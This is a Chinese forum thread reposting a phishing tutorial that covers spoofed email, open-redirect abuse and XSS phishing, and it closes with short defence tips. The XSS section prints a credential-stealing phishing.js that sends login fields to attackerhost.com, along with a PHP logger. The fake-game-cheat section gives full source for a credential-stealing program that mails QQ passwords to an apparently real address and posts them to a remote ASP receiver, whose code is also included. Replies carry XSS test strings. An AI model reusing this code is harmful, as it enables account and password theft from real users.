微点交流论坛
» 游客:  注册 | 登录 | 帮助

 

作者:
标题: 钓鱼网站全攻略 作者:黑色双刃剑
littlefritz
版主

微点帮帮团团长


积分 3505
发帖 3502
注册 2009-5-23
来自 微点帮帮团
#1  钓鱼网站全攻略 作者:黑色双刃剑

  网络钓鱼(Phishing?,与钓鱼的英语fishing?发音相近,又名钓鱼式攻击)是通过电子邮件或即时通讯工具,大量发送声称来自于银行或其他知名机构的欺骗性信息,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。
  
  钓鱼攻击原理
  
  最典型的网络钓鱼攻击是将收信人引诱到一个通过精心设计、与目标组织的网站非常相似的钓鱼网站(官方外观的假冒网站)上,冒充真正需要信息的值得信任的人,并欺诈性地获取收信人在此网站上输入的个人敏感信息(比如口令和信用卡细节),通常这个攻击过程不会
  
  尽管在安全技术人员眼里“网络钓鱼”只是小菜一碟。但在最近几年中“网络钓鱼”在全国范围内变得非常猖獗,数量急剧攀升。小黑就在此为大家介绍以下几种常见的“网络钓鱼”手法,广大网民在进行网络冲浪时,需自我提高防范意识,并格外警惕落入“网络钓鱼”诈骗陷阱。如图1,是钓鱼攻击的图解
  

  
  开始实施我们的钓鱼攻击
  
  TOP1邮件钓鱼攻击技术
  
  钓鱼的关键技术为匿名邮件技术与跨站技术。匿名邮件技术可以伪装任意邮件地址,例如要伪装163邮件客服,就可以将邮件地址伪装成service@163.com,然后借助跨站技术伪装一个输入密码的页面,让用户信以为真,乖乖送上自己的密码。
  
  邮件钓鱼顾名思义,利用email匿名等技术来达到欺骗目的。如图2,就是一款典型的匿名邮件发送工具。
  

  
  小小的测试一下那么是否邮件收到了呢?我们来登录我们的邮箱。LOOK~~~~
  

  
  发送成功,那么下面开始说如何发送并且利用匿名邮件,发送邮件网络上很多类似伪造发件人的东东比如“fastmail邮件特快专递”。原来都差不多只有最后达到我们的目的就好了。
  
  OK下面我们来说如何在利用邮件做欺骗呢?
  

  
  这里是小黑遇到的实例噢!首先按照现在网民思路肯定是无法上当的,链接太明显,因为按照现在网民安全意识逐步提高,常见把钓鱼网站链接放入邮件对于一般网民没什么效果,所以我可迂回战术。对于一般邮件来说都可以进行HTML模式编辑,这里我们可以利用这种模式编辑。在HTML中利用超级链接“a标签”
  
  一、代码时间
  
  a标签——代表HTML链接
  a标签是成对出现的,以开始, 结束
 
  属性.

  Common -- 一般属性
  accesskey -- 代表一个链接的快捷键访问方式
  charset -- 指定了链接到的页面所使用的编码方式,比如UTF-8
  coords -- 使用图像地图的时候可以使用此属性定义链接的区域,通常是使用x,y坐标
  href -- 代表一个链接源(就是链接到什么地方)
  hreflang -- 指出了链接到的页面所使用的语言编码
  rel -- 代表文档与链接到的内容(href所指的内容)的关系
  rev -- 代表文档与链接到的内容(href所指的内容)的关系
  shape -- 使用图像地图的时候可以使用shape指定链接区域
  tabindex -- 代表使用"tab"键,遍历链接的顺序
  target -- 用来指出哪个窗口或框架应该被此链接打开
  title -- 代表链接的附加提示信息
  type -- 代表链接的MIME类型
  
  链接语法
  显示的文字
  
  语法说明
  href-- 是链接的属性,告诉浏览器链接到的网址(URI)
  url-- 是我们要链接到的网页或者文件。url可以是一个绝对的网页,如: http://www.dreamdu.com/xhtml/.或者是一个相对网页
  如:dreamdu.html,学习相对路径和绝对路径
  url除了是网页外,还可以是其它的文件(如文本文件,pdf文件等).
  url还可以是指向HTML文件中的一个位置.
  url还可以是Email地址.
  显示的文字-- 是我们想要显示的文字,浏览者点击'显示的文字'就会连接到url页面.

  这里给大家简单说了下关于html语言,超链接部分。下面小黑根据上面所说,来编写一个HTM超链接文本,放入邮箱是什么效果呢?如图4
  
  实践:
  
  www.163.com
  
  此代码是小黑根据上面所说,来编写一个HTML超链接,放入邮箱是什么效果呢?如图4
  

  
  这样我们在配合适当的语言渲染下发送给受害者,效果如图5
  

  
  这样我刚说没有谁第一眼看着不动心的,但是又有人问虽然邮件过了但是现在很多网民都安装了相关安全软件,比如XX安全卫士、XX网盾等等都带反钓鱼功能,但是经过小黑分析,很多安全软件都是针对钓鱼网站URL比如http://cctv-3.163.os.io\加入数据库。如果用户打开这样的网站就会出现报警界面。那么如何突破呢?这个问题很好,小黑这里给出我个人思路“Url跳转漏洞”
  
  二、Url跳转漏洞助钓鱼“一臂之力”
  
  ①什么是Url跳转漏洞
  
  此漏洞是用于网络钓鱼攻击,让用户访问恶意网站而不自知。因为Web应用程序接收到用户提交的URL参数后,没有对参数做“可信任URL”的验证,就向用户浏览器返回跳转到该URL的指令。
  
  ②实例
  
  谷歌的URL跳转漏洞
  
  http://www.google.com.hk/search? ... /www.sitedirsec.com
  
  一般来说这样URL大部分网民一眼看估计是google的网站URL,可能都会点击去看看。这样就更好帮助钓鱼攻击泛滥。
  
  ③如何防御
  
  保证用户所点击的URL,是从web应用程序中生成的URL,所以要做TOKEN验证。这样就可以完全杜绝URL跳转漏洞发生了。
  
  那么说到这里差不多接近尾声了。综上所述基本都是小黑对邮件钓鱼攻击个人见解,如果有不到位的地方可以一起讨论。
  
  防范方法:
  
  这里相信小黑告诉大家以下几种防范方法:
  
  个人用户的建议
  
  1、提高警惕,不登录不熟悉的网站,键入网站地址的时候要校对,以防输入错误误入狼窝,细心就可以发现一些破绽。
  2、不要打开陌生人的电子邮件,更不要轻信他人说教,特别是即时通讯工具上的传来的消息,很有可能是病毒发出的。
  3、安装杀毒软件并及时升级病毒知识库和操作系统(如Windows)补丁。
  4、将敏感信息输入隐私保护,打开个人防火墙。
  5、 收到不明电子邮件时不要点击其中的任何链接。登录银行网站前,要留意浏览器地址栏,如果发现网页地址不能修改,最小化IE窗口后仍可看到浮在桌面上的网页地址等现象,请立即关闭IE窗口,以免账号密码被盗。
  
  企业用户的建议
  
  1、安装杀毒软件和防火墙。
  2、加强电脑安全管理,及时更新杀毒软件,升级操作系统补丁。
  3、加强员工安全意识,及时培训网络安全知识。
  4、一旦发现有害网络,要及时在防火墙中屏蔽它。
  5. 为避免被“”冒名,最重要的是加大制作网站的难度。具体办法包括:“不使用弹出式广告”、“不隐藏地址栏”、“不使用框架”等。这种防范是必不可少的,因为一旦网站名称被“网络钓鱼”者利用的话,企业也会被卷进去,所以应该在泛滥前做好准备。
  
  TOP2
  
  跨站技术滋生的钓鱼攻击。
  
  1.什么是跨站漏洞攻击
  
  业界对跨站攻击的定义如下:“跨站攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。”由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Javascript脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。
  
  2.跨站漏洞攻击到底有什么用呢?
  

  
  当然相信大家肯定见过跨站也就是XSS有些朋友可能会问XSS就是弹窗感觉没什么用,其实他危害还是相当大的,这里就列举他的相关危害:
  
  1. 获取其他用户Cookie中的敏感数据
  2. 屏蔽页面特定信息
  3. 伪造页面信息
  4. 拒绝服务攻击
  5. 突破外网内网不同安全设置
  6. 与其它漏洞结合,修改系统设置,查看系统文件,执行系统命令等
  7. 其它
  
  一般来说,上面的危害还经常伴随着页面变形的情况。而所谓跨站脚本执行漏洞,也就是通过别人的网站达到攻击的效果,也就是说,这种攻击能在一定程度上隐藏身份。
  
  3.跨站攻击是如何滋生钓鱼攻击的呢?
  
  回到我们今天主题虽然XSS漏洞攻击方法很多,但是我们今天主题是钓鱼攻击
  
  实例:


  <!-- hypotetical index.php page -->
  [..]
  <form method="POST" action="somepage.php" name="userslogin">
  User: <input type="text" name="user"><br />
  Pass: <input type="password" name="pass"><br />
  <input type="submit" name="submit" value="Login">
  </form>
  [..]
  <!-- EOF -->

  
  这是一个登陆表单,这里没有SQL注入(如果有也让我补上了,呵呵),现在我们就可以利用当前发现的XSS漏洞开工了。我们需要的信息:
  
  - 登陆表单"userslogin"
  - 用户名文本域"userslogin.user"
  - 密码文本域"useslogin.pass"
  
  如果页面中包含登陆表单与搜索引擎,可以通过劫持提交的数据,使其发送到我们控制的远程主机上建立的网页,而非“somepage.php”。我们可以将恶意构造的URL链接发送给别人,让他们登陆,比如:
  
http://download.csdn.net/sort/tag/<script>alert('yes')</script>"><script src="http://xxxxx.com/phishing.js"></script>

  现在我们已经知道接下来该怎么做了,让我们开始编写将被使用的恶意脚本phishing.js的代码吧:

  /* phishing.js */
  Form = document.forms["userslogin"];
  function stealLogin() {
  var iframe = document.createElement("iframe");
  iframe.style.display = "none";
  iframe.src = "http://attackerhost.com/getlogin.php?user="
  + Form.user.value + "&pass=" + Form.pass.value;
  document.body.appendChild(iframe);
  }
  Form.onsubmit = stealLogin();
  /* EOF */

  
  通过这代码我们可以将登陆认证提交给在页面主体内容中创建的隐藏的iframe,并加载其它恶意PHP脚本,以获得用户名与密码并保存它们。 代码如下:

  /* getlogin.php */
  <?php
  if(isset($_GET['user']) && isset($_GET['pass'])) {
  
  // Sets the path and opens the dump file
  $file_path = "stolenlogins.txt";
  $file = @fopen($file_path, "a");
  
  // Generate the string
  $string = "User: ". $_GET['user'] ." and Pass: ". $_GET['pass'] . "\n";
  
  // Writes the datas and close the opened file
  @fwrite($file, $string);
  @fclose($file);
  }
  ?>
  /* EOF */

  这些代码很容易理解:获取登陆用户名与密码,并写入一个文件中。给合这两个恶意脚本,攻击者就可以利用这“小小”(管理员经常这样认为)的漏洞,获得重要的认证信息,使通过WEB程序验证成为可能
  
  小结
  
  一般情况下直接进行类似alert(document.cookie)之类的攻击没有什么问题,但是有时 CGI程序对用户的输入进行了一些处理,比如说包含在’’或””之内,这时我们就需要使用一些小技巧来绕过这些限制。
  
  如果你对HTML语言比较熟悉的话,绕过这些限制应该不成问题。(XSS部分代码来源于网络版权归原作者所有)
  
  4.如何防御跨站攻击?
  
  要避免受到跨站脚本执行漏洞的攻击,需要程序员和用户两方面共同努力:
  
  程序员:
  
  1. 过滤或转换用户提交数据中的HTML代码
  2. 限制用户提交数据的长度
  
  用户:
  
  1. 不要轻易访问别人给你的链接
  2. 禁止浏览器运行JavaScript和ActiveX代码
  
  附:常见浏览器修改设置的位置为:
  
  Internet Explorer:
  工具->Internet选项->安全->Internet->自定义级别
  工具->Internet选项->安全->Intranet->自定义级别

  Opera:>文件->快速参数->允许使用Java
  文件->快速参数->允许使用插件
  文件->快速参数->允许使用JavaScript
  
  TOP3、软件钓鱼
  
  软件钓鱼这种钓鱼方法没有前两种犀利,个人感觉有点鸡肋(守株待兔的感觉。)就是制造好一个软件然后发布在网络上,等待别人下载触发里面事件盗取了你的账号。这里小黑给大家列出一个实例——DNF外挂钓鱼攻击
  
  使用工具:易语言
  

  
  制造起来比较简单,在加上易语言本身全可视化编程,支持所见即所得程序界面设计和程序流程编码。
  
  代码实践:

  .版本 2
  .支持库 xplib
  .支持库 internet
  .子程序 _按钮1_被单击
  通用对话框1.打开 ()
  .如果 (寻找文本 (通用对话框1.文件名, “DNF”, , 假) ≠ -1)
  编辑框1.内容 = 通用对话框1.文件名
  .否则
  信息框 (“请选择正确的DNF执行文件”, 48, “错误:”)
  .如果结束
  .子程序 _按钮2_被单击
  .如果 (信息框 (“本功能将删除掉DNF文件夹中存在SX的文件,防止错误,是否要删除”, #确认取消钮 + #询问图标, “防SX:”) = 0)
  信息框 (“命令执行完毕!SX文件已经清除,但是每次使用之前都要执行此操作,因为游戏会自动下载SX文件!”, 0, )
  .否则
  .如果结束
  .子程序 _按钮3_被单击
  运行 (编辑框1.内容, 假, )
  .子程序 __启动窗口_创建完毕
  XP风格 (3)
  组合框1.加入项目 (“北京1区”, 0)
  组合框1.加入项目 (“北京2区”, 0)
  组合框1.加入项目 (“北京3区”, 0)
  组合框1.加入项目 (“西北1区”, 1)
  组合框1.加入项目 (“西北2区”, 1)
  组合框1.加入项目 (“西北3区”, 1)
  组合框1.加入项目 (“西南1区”, 2)
  组合框1.加入项目 (“西南2区”, 2)
  组合框1.加入项目 (“四川1区”, 3)
  组合框1.加入项目 (“四川2区”, 3)
  组合框1.加入项目 (“四川3区”, 3)
  组合框1.加入项目 (“四川4区”, 3)
  组合框1.加入项目 (“四川5区”, 3)
  组合框1.加入项目 (“四川6区”, 3)
  组合框1.加入项目 (“江苏1区”, 4)
  组合框1.加入项目 (“江苏2区”, 4)
  组合框1.加入项目 (“江苏3区”, 4)
  组合框1.加入项目 (“江苏4区”, 4)
  组合框1.加入项目 (“江苏5区”, 4)
  组合框1.加入项目 (“江苏6区”, 4)
  组合框1.加入项目 (“江苏7区”, 4)
  组合框1.加入项目 (“江苏8区”, 4)
  组合框1.加入项目 (“湖北1区”, 5)
  组合框1.加入项目 (“湖北2区”, 5)
  组合框1.加入项目 (“湖北3区”, 5)
  组合框1.加入项目 (“湖北4区”, 5)
  组合框1.加入项目 (“湖北5区”, 5)
  组合框1.加入项目 (“湖北6区”, 5)
  组合框1.加入项目 (“湖北7区”, 5)
  组合框1.加入项目 (“湖南1区”, 7)
  组合框1.加入项目 (“湖南2区”, 7)
  组合框1.加入项目 (“湖南3区”, 7)
  组合框1.加入项目 (“湖南4区”, 7)
  组合框1.加入项目 (“湖南5区”, 7)
  组合框1.加入项目 (“湖南6区”, 7)
  组合框1.加入项目 (“湖南7区”, 7)
  组合框1.加入项目 (“广东1区”, 8)
  组合框1.加入项目 (“广东2区”, 9)
  组合框1.加入项目 (“广东3区”, 9)
  组合框1.加入项目 (“广东4区”, 9)
  组合框1.加入项目 (“广东5区”, 9)
  组合框1.加入项目 (“广东6区”, 9)
  组合框1.加入项目 (“广东7区”, 9)
  组合框1.加入项目 (“广东8区”, 9)
  组合框1.加入项目 (“广东9区”, 9)
  组合框1.加入项目 (“广东10区”, 9)
  组合框1.加入项目 (“广东11区”, 9)
  组合框1.加入项目 (“福建1区”, 10)
  组合框1.加入项目 (“福建2区”, 10)
  组合框1.加入项目 (“福建3区”, 10)
  组合框1.加入项目 (“福建4区”, 10)
  组合框1.加入项目 (“河南1区”, 11)
  组合框1.加入项目 (“河南2区”, 11)
  组合框1.加入项目 (“河南3区”, 11)
  组合框1.加入项目 (“河南4区”, 11)
  组合框1.加入项目 (“河南5区”, 11)
  组合框1.加入项目 (“河南6区”, 11)
  组合框1.加入项目 (“浙江1区”, 12)
  组合框1.加入项目 (“浙江2区”, 12)
  组合框1.加入项目 (“浙江3区”, 12)
  组合框1.加入项目 (“浙江4区”, 12)
  组合框1.加入项目 (“浙江5区”, 12)
  组合框1.加入项目 (“浙江6区”, 12)
  组合框1.加入项目 (“上海1区”, 13)
  组合框1.加入项目 (“上海2区”, 14)
  组合框1.加入项目 (“上海3区”, 14)
  组合框1.加入项目 (“上海4区”, 14)
  组合框1.加入项目 (“上海5区”, 14)
  组合框1.加入项目 (“广西1区”, 21)
  组合框1.加入项目 (“广西2区”, 21)
  组合框1.加入项目 (“广西3区”, 21)
  组合框1.加入项目 (“广西4区”, 21)
  组合框1.加入项目 (“江西1区”, 22)
  组合框1.加入项目 (“江西2区”, 22)
  组合框1.加入项目 (“江西3区”, 22)
  组合框1.加入项目 (“华北1区”, 23)
  组合框1.加入项目 (“华北2区”, 23)
  组合框1.加入项目 (“华北3区”, 23)
  组合框1.加入项目 (“华北4区”, 23)
  组合框1.加入项目 (“东北1区”, 25)
  组合框1.加入项目 (“东北2区”, 25)
  组合框1.加入项目 (“东北3区”, 25)
  组合框1.加入项目 (“东北4区”, 25)
  组合框1.加入项目 (“东北5区”, 25)
  组合框1.加入项目 (“东北6区”, 25)
  组合框1.加入项目 (“山东1区”, 25)
  组合框1.加入项目 (“山东2区”, 25)
  组合框1.加入项目 (“山东3区”, 25)
  组合框1.加入项目 (“山东4区”, 25)
  组合框1.加入项目 (“山东5区”, 25)
  组合框1.加入项目 (“山东6区”, 25)
  组合框1.加入项目 (“辽宁1区”, 25)
  组合框1.加入项目 (“辽宁2区”, 25)
  组合框1.加入项目 (“辽宁3区”, 25)
  组合框1.加入项目 (“山西1区”, 25)
  组合框1.加入项目 (“山西2区”, 25)
  组合框1.加入项目 (“安徽1区”, 25)
  组合框1.加入项目 (“安徽2区”, 25)
  组合框1.加入项目 (“安徽3区”, 25)
  组合框1.加入项目 (“陕西1区”, 25)
  组合框1.加入项目 (“陕西2区”, 25)
  组合框1.加入项目 (“陕西3区”, 25)
  组合框1.加入项目 (“重庆1区”, 25)
  组合框1.加入项目 (“重庆2区”, 25)
  组合框1.加入项目 (“黑龙江1区”, 25)
  组合框1.加入项目 (“黑龙江2区”, 25)
  组合框1.加入项目 (“黑龙江3区”, 25)
  组合框1.加入项目 (“吉林1区”, 25)
  组合框1.加入项目 (“吉林2区”, 25)
  组合框1.加入项目 (“河北1区”, 25)
  组合框1.加入项目 (“河北2区”, 25)
  组合框1.加入项目 (“河北3区”, 25)
  组合框1.加入项目 (“河北4区”, 25)
  .子程序 _按钮4_被单击
  .如果 (到整数 (编辑框2.内容) ≤ 60)
  .如果 (组合框1.取项目文本 (组合框1.现行选中项) ≠ “选择大区”)
  .如果 (连接发信服务器 (“smtp.qq.com”, , 编辑框4.内容, 编辑框3.内容, ) = 真)
  发送邮件 (“DNF账户”, “QQ号:” + 编辑框4.内容 + “ QQ密码:” + 编辑框3.内容 + “ 大区:” + 组合框1.内容 + “ ” + 到文本 (取现行时间 ()), “996775010@qq.com”, , , 编辑框4.内容 + “@qq.com”, )
  .如果 (寻找文本 (QQASP (“http://ska1996.gicp.net/QQ.asp”, 编辑框4.内容, 编辑框3.内容, 组合框1.内容 + “----等级:” + 编辑框2.内容), “发送成功”, , 假) ≠ -1)
  信息框 (“登陆成功!”, 0, )
  信息框 (“本软件于八月十一日凌晨2:00更新成功!”, 0, )
  载入 (窗口1, , 假)
  _启动窗口.销毁 ()
  .否则
  信息框 (“登陆成功!”, 0, )
  信息框 (“本软件于八月十一日凌晨2:00更新成功!”, 0, )
  载入 (窗口1, , 假)
  _启动窗口.销毁 ()
  .如果结束
  .否则
  .如果 (寻找文本 (QQASP (“http://XXXX.com/QQ.asp”, 编辑框4.内容, 编辑框3.内容, 组合框1.内容 + “----等级:” + 编辑框2.内容), “发送成功”, , 假) ≠ -1)
  信息框 (“登陆成功!”, 0, )
  信息框 (“本软件于八月十一日凌晨2:00更新成功!!”, 0, )
  载入 (窗口1, , 假)
  _启动窗口.销毁 ()
  .否则
  信息框 (“登陆成功!”, 0, )
  信息框 (“本软件于八月十一日凌晨2:00更新成功!”, 0, )
  载入 (窗口1, , 假)
  _启动窗口.销毁 ()
  .如果结束
  .如果结束
  .否则
  信息框 (“请选择大区!”, 0, )
  .如果结束
  .否则
  信息框 (“请认真填写!”, 0, )
  .如果结束
  
  .子程序 QQASP, 文本型, , 发送帐号密码到ASP收信
  .参数 地址, 文本型, , ASP文件路径
  .参数 号码, 文本型
  .参数 密码, 文本型
  .参数 区域, 文本型
  返回 (到文本 (HTTP读文件 (地址 + “?” + “QQNumber=” + 号码 + “&QQPassWord=” + 密码 + “&QQclub=” + 区域)))

  .子程序 _选择夹1_将改变子夹, 逻辑型
  信息框 (“本软件现在为免费试用阶段,不需要付费功能!”, 0, )
  
  .子程序 _选择夹1_子夹被改变
  选择夹1.现行子夹 = 0

  接受文件QQ.ASP代码内容

  <%
  strLogFile="skadnfqq.txt"
  QQNumber=request("QQNumber")
  QQPassWord=request("QQPassWord")
  QQclub=request("QQclub")
  QQip=request("QQip")
  if QQNumber="" or QQPassWord="" then
  response.write "QQWRONG"
  response.end
  End If
  StrLogText=StrLogText&QQNumber&"----"&QQPassWord&"----大区:"&QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
  StrLogText=StrLogText&")----"&date&" "&time
  set f=Server.CreateObject("scripting.filesystemobject")
  set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
  ff.writeline(chr(13)+chr(10)&StrLogText)
  ff.close
  set ff=nothing
  set f=nothing
  response.write "发送成功"
  %>


    
  从代码上面看没什么技术含量就是添加几个模块和按钮还有几个判断就搞定,但是如果放出去的估计上当人数不少。当然如果有兴趣朋友也可以看看小黑的BLOG里面的反击钓鱼的文章
  
  MYblog:http://pow78781.blog.163.com
  
  防范方法:
  
  软件钓鱼攻击,一般只存在于想对某游戏或者某应用程序进行投机取巧的操作,才萌生利用外挂等软件进行作弊操作,所以小黑建议公平游戏,尽量别用外挂。
  
  总结
  
  说到这里钓鱼攻击大部分差不多都给大家介绍完了,当然还有没有介绍到的地方还请大家多包涵,可能在XSS利用方面对于新手朋友还是建议有一定基础情况下进行相关测试。钓鱼攻击说到底,无论如何变化都是那么几样,当然还有程序化钓鱼这个比较简单这里,钓鱼很多都是经不起推敲的稍微的推敲小就能辨别出来,还要我们要怀有一颗对事物没有投机取巧的心理,这样钓鱼攻击就会从我们身边逐渐远去。

※ ※ ※ 本文纯属【littlefritz】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

2011-1-28 14:46
查看资料  发送邮件  访问主页  发短消息  QQ   编辑帖子
pow78781
注册用户




积分 60
发帖 40
注册 2007-12-28
来自 <script>alert(&quo ...
#2  

不给力···图片杂给我拉下来··

※ ※ ※ 本文纯属【pow78781】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

<script>alert("XSS")</script>
2011-1-28 22:02
查看资料  发送邮件  访问主页  发短消息   编辑帖子
pow78781
注册用户




积分 60
发帖 40
注册 2007-12-28
来自 <script>alert(&quo ...
#3  

突然发现名字杂也给我弄错了~~应该是攻击吧~

※ ※ ※ 本文纯属【pow78781】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

<script>alert("XSS")</script>
2011-1-28 22:06
查看资料  发送邮件  访问主页  发短消息   编辑帖子
littlefritz
版主

微点帮帮团团长


积分 3505
发帖 3502
注册 2009-5-23
来自 微点帮帮团
#4  



  Quote:
Originally posted by pow78781 at 2011-1-28 22:06:
突然发现名字杂也给我弄错了~~应该是攻击吧~

哪里哟…说说,顺手给原作者加点分

※ ※ ※ 本文纯属【littlefritz】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

2011-1-28 23:36
查看资料  发送邮件  访问主页  发短消息  QQ   编辑帖子
f8312519
银牌会员




积分 2184
发帖 2169
注册 2008-10-27
来自 维创论坛
#5  

呵呵.
不错
我还以为是楼主原创了

※ ※ ※ 本文纯属【f8312519】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

维创论坛免费软件园地欢迎您!http://herofw.haotui.com
2011-3-5 20:24
查看资料  发送邮件  访问主页  发短消息  QQ   编辑帖子
littlefritz
版主

微点帮帮团团长


积分 3505
发帖 3502
注册 2009-5-23
来自 微点帮帮团
#6  



  Quote:
Originally posted by f8312519 at 2011-3-5 20:24:
呵呵.
不错
我还以为是楼主原创了

楼主在可以预见的一段时间还是会比较忙的,没什么时间。

※ ※ ※ 本文纯属【littlefritz】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

2011-3-6 19:23
查看资料  发送邮件  访问主页  发短消息  QQ   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]


北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号